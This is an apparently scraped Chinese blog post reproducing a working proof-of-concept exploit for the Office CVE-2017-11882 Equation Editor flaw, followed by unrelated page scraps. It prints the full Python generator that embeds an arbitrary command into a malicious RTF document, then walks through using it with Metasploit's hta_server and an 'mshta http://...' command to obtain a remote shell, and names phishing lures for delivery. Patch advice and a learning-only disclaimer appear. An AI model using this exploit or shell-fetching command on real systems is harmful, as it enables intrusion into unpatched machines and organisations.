Office远程代码执行漏洞现POC样本

最近这段时间CVE-2017-11882挺火的。关于这个漏洞可以看看这里:https://www.77169.com/html/186186.html

今天在twitter上看到有人共享了一个POC,https://twitter.com/gossithedog/status/932694287480913920,http://owned.lab6.com/%7Egossi/research/public/cve-2017-11882/,后来又看到有人共享了一个项目https://github.com/embedi/CVE-2017-11882,简单看了一下这个项目,通过对rtf文件的修改来实现命令执行的目的,最新 Office 的 CVE-2017-11882,完美无弹窗,无视宏,影响 office 全版本。利用触发器 WebClient 服务从攻击者控制的 WebDav 服务器启动和执行远程文件。该脚本使用多个 OLE 对象创建简单的文档。这些对象利用 CVE-2017-11882,从而导致连续命令执行。,具体项目地址如下:

POC地址:https://github.com/Ridter/CVE-2017-11882/

POC源码如下:

  1 import argparse
2 import sys
3
4
5 RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
6 {\*\generator Riched20 6.3.9600}\viewkind4\uc1
7 \pard\sa200\sl276\slmult1\f0\fs22\lang9"""
8
9
10 RTF_TRAILER = R"""\par}
11 """
12
13
14 OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """
15
16
17 OBJECT_TRAILER = R"""
18 }{\result {\rtlch\fcs1 \af0 \ltrch\fcs0 \dn8\insrsid95542\charrsid95542 {\pict{\*\picprop\shplid1025{\sp{\sn shapeType}{\sv 75}}{\sp{\sn fFlipH}{\sv 0}}
19 {\sp{\sn fFlipV}{\sv 0}}{\sp{\sn fLockAspectRatio}{\sv 1}}{\sp{\sn pictureGray}{\sv 0}}{\sp{\sn pictureBiLevel}{\sv 0}}{\sp{\sn fRecolorFillAsPicture}{\sv 0}}{\sp{\sn fUseShapeAnchor}{\sv 0}}{\sp{\sn fFilled}{\sv 0}}{\sp{\sn fHitTestFill}{\sv 1}}
20 {\sp{\sn fillShape}{\sv 1}}{\sp{\sn fillUseRect}{\sv 0}}{\sp{\sn fNoFillHitTest}{\sv 0}}{\sp{\sn fLine}{\sv 0}}{\sp{\sn fPreferRelativeResize}{\sv 1}}{\sp{\sn fReallyHidden}{\sv 0}}
21 {\sp{\sn fScriptAnchor}{\sv 0}}{\sp{\sn fFakeMaster}{\sv 0}}{\sp{\sn fCameFromImgDummy}{\sv 0}}{\sp{\sn fLayoutInCell}{\sv 1}}}\picscalex100\picscaley100\piccropl0\piccropr0\piccropt0\piccropb0
22 \picw353\pich600\picwgoal200\pichgoal340\wmetafile8\bliptag1846300541\blipupi2307{\*\blipuid 6e0c4f7df03da08a8c6c623556e3c652}0100090000035100000000001200000000000500000009020000000005000000020101000000050000000102ffffff00050000002e0118000000050000000b02
23 00000000050000000c02200240011200000026060f001a00ffffffff000010000000c0ffffffaaffffff00010000ca0100000b00000026060f000c004d61746854797065000040000a00000026060f000a00ffffffff010000000000030000000000}}}}
24 """
25
26
27 OBJDATA_TEMPLATE = R"""
28 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
29 b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
30 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
31 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
32 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
33 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
34 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
35 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
36 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
37 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
38 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
39 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
40 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
41 fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
42 fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
43 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
44 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
45 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
46 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
47 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
48 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
49 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
50 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
51 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
52 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
53 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
54 ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
55 00000000000000000000000000000000000000000000000000000000000000000000000000000000
56 00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
57 000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
58 00000000000000000000000000000000000000000000000000000000000000000000000000000000
59 00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
60 0000000000000000000000000000000000000000000000000000001400000000000000010043006f
61 006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
62 00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
63 00000000000000000000000000000000000000000000000000000000000000010000006600000000
64 00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
65 00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
66 ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
67 0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
68 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
69 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
70 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
71 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
72 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
73 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
74 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
75 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
76 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
77 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
78 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
79 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
80 ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
81 0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
82 ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
83 30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
84 00000000000000000000000000000000000000000000000000000000000000000000000000030004
85 00000000000000000000000000000000000000000000000000000000000000000000000000000000
86 000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
87 ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141
88 414141414141414141414141414141414141414141120c4300000000000000000000000000000000
89 00000000000000000000000000000000000000000000000000000000000000000000000000000000
90 00000000000000000000000000000000000000000000000000000000000000000000000000000000
91 00000000000000000000000000000000000000000000000000000000000000000000000000000000
92 00000000000000000000000000000000000000000000000000000000000000000000004500710075
93 006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
94 0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
95 0000000000000000000000000000000000000000000000000000000000000004000000c500000000
96 00000000000000000000000000000000000000000000000000000000000000000000000000000000
97 00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
98 ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
99 00000000000000000000000000000000000000000000000000000000000000000000000000000000
100 000000000000000000000000000000000000000000000000000000000000000000000000000000ff
101 ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
102 00000000000000000000000000000000000000000000000000000000000000000000000000000000
103 00000000000000000000000000000000000000000000000000000000000000000000000000000000
104 00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
105 00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
106 45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
107 000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
108 050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
109 ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
110 54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
111 7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
112 90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
113 0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
114 31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
115 0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
116 7cef1800040000002d01010004000000f0010000030000000000
117 """
118
119
120 COMMAND_OFFSET = 0x949*2
121
122
123 def create_ole_exec_primitive(command):
124 if len(command) > 43:
125 print "[!] Primitive command must be shorter than 43 bytes"
126 sys.exit(0)
127 hex_command = command.encode("hex")
128 objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "\r\n")
129 ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]
130 return OBJECT_HEADER + ole_data + OBJECT_TRAILER
131
132
133
134 def create_rtf(header,command,trailer):
135 ole1 = create_ole_exec_primitive(command + " &")
136
137 # We need 2 or more commands for executing remote file from WebDAV
138 # because WebClient service start may take some time
139 return header + ole1 + trailer
140
141
142
143 if __name__ == '__main__':
144 parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
145 parser.add_argument("-c", "--command", help="Command to execute.", required=True)
146 parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
147
148 args = parser.parse_args()
149
150 rtf_content = create_rtf(RTF_HEADER, args.command ,RTF_TRAILER)
151
152 output_file = open(args.output, "w")
153 output_file.write(rtf_content)
154
155 print "[*] Done ! output file --> " + args.output

复现过程:

使用方式很简单,要通过执行命令来生成漏洞 doc 文件,首先简单的测试一下是否能够弹出计算器,命令如下:

python python.py -c "cmd.exe /c calc.exe" -o 1.doc,则:

那么相应地生成了1.doc文件:当我打开1.doc的时候 会提示如下信息:

点击允许之后:

就会自动调用计算器,既然能够实现弹出,那我们可以构造执行 powershell 直接获取 msf 会话。

深入利用

在利用前,先了解一下 hta,hta 文件使用 HTML 格式,它的程序码可以像 HTML 一样被编辑和检查。在 hta 文件中 VBScript 和 JavaScript 的程序码可以任意混合。HTA 虽然用 HTML、JS 和 CSS 编写,却比普通网页权限大得多。它具有桌面程序的所有权限(读写文件、操作注册表等)。hta 本来就是被设计为桌面程序的。

在复现过程中,察觉到是使用 hta 进行命令执行利用,推测攻击机作为 hta_server,然后尝试在 msf 搜索 hta,发现一个模块的实现效果跟 PS_shell 一样,接下来开始演示一下:

1、在 msf 搜索 hta_server 模块,然后 use,设置好相关参数,exploit -j:

2、攻击机用脚本生成doc文件:

python python.py -c "mshta http://192.168.1.115:8080/test"-o test2.doc

3、用测试机打开 doc 文件,测试机正常上线:

攻击成功,到此为止,这个模块的实验成功返回 shell。然后换成了 win7 + office2007 环境,也成功 getshell。

由于办公文档是常用的,人们在查看 doc 等文档文件时不会过多注意。但当 Office 办公软件存在漏洞时,就会成为黑客的工具。

防御方法:

目前微软公司已经发布了安全补丁下载微软对此漏洞补丁:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

大家可以安装补丁修复该漏洞并开启自动更新功能,另外大部分杀软已经采取了防御措施,经测试部分杀软直接把 mshta、rundll32、powershell 执行的命令都会做相关拦截,并提示给用户这是可疑操作。

这个漏洞 APT 领域可谓神洞,利用起来如此方便,对于用户来说,要做的不仅仅是要及时更新补丁、安装杀毒软件,还要提升自己的安全意识,知道这个漏洞在实际场景中是如何被运用的,可以针对性的应对。这种漏洞在 APT 领域通常会结合社会工程学的技术来运用,常用的社会工程学技巧包括:发送钓鱼邮件(附件类型)、通过聊天软件(获取你的新人诱使你打开文档)、在你经常光顾的网站上上传恶意文档等。在自己的系统没有更新到最新的补丁或者没有安装杀毒软件的情况下对于别人发来的文档尽量不要打开,一旦运行,对于个人是个人电脑被人入侵,如果在企业,那么你所在的企业安全就岌岌可危了。

本次技术分享仅供个人测试验证及学习,请勿用于任何非法用途,谢谢!

防御方法:

目前微软公司已经发布了安全补丁下载微软对此漏洞补丁:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

大家可以安装补丁修复该漏洞并开启自动更新功能,另外大部分杀软已经采取了防御措施,经测试部分杀软直接把 mshta、rundll32、powershell 执行的命令都会做相关拦截,并提示给用户这是可疑操作。

Office--CVE-2017-11882【远程代码执行】的更多相关文章

  1. Office CVE-2017-8570远程代码执行漏洞复现

    实验环境 操作机:Kali Linux IP:172.16.11.2 目标机:windows7 x64 IP:172.16.12.2 实验目的 掌握漏洞的利用方法 实验工具 Metaspliot:它是 ...

  2. 隐藏17年的Office远程代码执行漏洞(CVE-2017-11882)

    Preface 这几天关于Office的一个远程代码执行漏洞很流行,昨天也有朋友发了相关信息,于是想复现一下看看,复现过程也比较简单,主要是简单记录下. 利用脚本Github传送地址 ,后面的参考链接 ...

  3. office远程代码执行(CVE-2017-11882)

    office远程代码执行(CVE-2017-11882) 影响版本: MicrosoftOffice 2000 MicrosoftOffice 2003 MicrosoftOffice 2007 Se ...

  4. 漏洞复现-Office远程代码执行漏洞 (CVE-2017-11882&CVE-2018-0802)

    漏洞原理 这两个漏洞本质都是由Office默认安装的公式编辑器(EQNEDT32.EXE)引发的栈溢出漏洞(不要问什么是栈溢出,咱也解释不了/(ㄒoㄒ)/~~) 影响版本 Office 365 Mic ...

  5. 【漏洞公告】CVE-2017-12615/CVE-2017-12616:Tomcat信息泄漏和远程代码执行漏洞

    2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定 ...

  6. 【漏洞公告】Tomcat信息泄漏和远程代码执行漏洞:CVE-2017-12615/CVE-2017-12616

    2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定 ...

  7. Apache Struts 远程代码执行漏洞(CVE-2013-4316)

    漏洞版本: Apache Group Struts < 2.3.15.2 漏洞描述: BUGTRAQ ID: 62587 CVE(CAN) ID: CVE-2013-4316 Struts2 是 ...

  8. MongoDB ‘conn’Mongo 对象远程代码执行漏洞

    漏洞名称: MongoDB ‘conn’Mongo 对象远程代码执行漏洞 CNNVD编号: CNNVD-201307-497 发布时间: 2013-07-25 更新时间: 2013-07-25 危害等 ...

  9. Struts2再爆远程代码执行漏洞

    Struts又爆远程代码执行漏洞!在这次的漏洞中,攻击者可以通过操纵参数远程执行恶意代码.Struts 2.3.15.1之前的版本,参数action的值redirect以及redirectAction ...

  10. 【更新WordPress 4.6漏洞利用PoC】PHPMailer曝远程代码执行高危漏洞(CVE-2016-10033)

    [2017.5.4更新] 昨天曝出了两个比较热门的漏洞,一个是CVE-2016-10033,另一个则为CVE-2017-8295.从描述来看,前者是WordPress Core 4.6一个未经授权的R ...

随机推荐

  1. js 判断字符串是否为空或是否全为空格

      判断字符串是否为空 if (str == "") { } 判断字符串是否为空且不能全为空格 if (str.match(/^[ ]*$/)) { } 第二种方式不仅可以校验空格 ...

  2. IIS 安装 .net core 绑定为 https 使用SSL证书

    前提条件: 自己服务器(Windows Server 2016)运行 dotnet .\Web****.dll 服务是可以使用http访问的 但由于实际情况必须使用https 思想历程,但未用: 1. ...

  3. AI保存文件出现了未知错误 (Adobe Illustrator)

    可能的原因如下:1 把文件中所有的文字全选,转成曲线,把所有的文字都创建成轮廓2 新建一个页面,把制作的复制到新页面里3 需要把图层全部解锁再保存4 没有权限,设置一下即可5 PRINT SPOOLE ...

  4. Configuration类的@Value属性值为null

    今天写的Configuration类的@Value属性值为null @Configuration public class MybatisConfigurer { @Value("${spr ...

  5. 【视频开发】IR-CUT作用

    自然界存在着各种波长的光线,通过折射人眼能看到不同颜色的光线,这就是光线的波长不同所导致的.其实还有许多光线是人眼看不到的,人眼识别光线的波长范围在320nm-760nm之间,超过760nm的光线人眼 ...

  6. 文本编辑 工具vim

    一vim的3种常用模式:一般模式.编辑模式和命令模式 如果系统里没有vim工具,需安装 1,一般模式 首先复制一个文件到/tmp/目录下,并改名为1,txt 移动光标: h 或 向左箭头键(←)    ...

  7. myeclipse导入项目后中文乱码

    window----preference ----general-----workspace-------text file encoding 可以多测试下:gbk,utf-8.....

  8. ubuntu docker 下mongodb集群和分片

    首先我们计划启动了三个mongo服务:master,salve,arbiter 1.准备工作 新建文件夹如图(每个文件夹下面有db和configdb文件夹): 生成认证文件并修改权限 openssl ...

  9. mysql替换字段中部分字符串

    解决:使用replace(obj, search, replace_str)函数; sql语法: UPDATE 表名 SET 字段名=replace(字段名, ‘被替换字符串’, '用来替换的字符串' ...

  10. ETCD 添加节点报错 tocommit(2314438) is out of range [lastIndex(0)]. Was the raft log corrupted, truncated, or lost?

    生产环境中一台ETCD节点宕机之后,添加新的节点的时候出现以下错误, tocommit(2314438) is out of range [lastIndex(0)]. Was the raft lo ...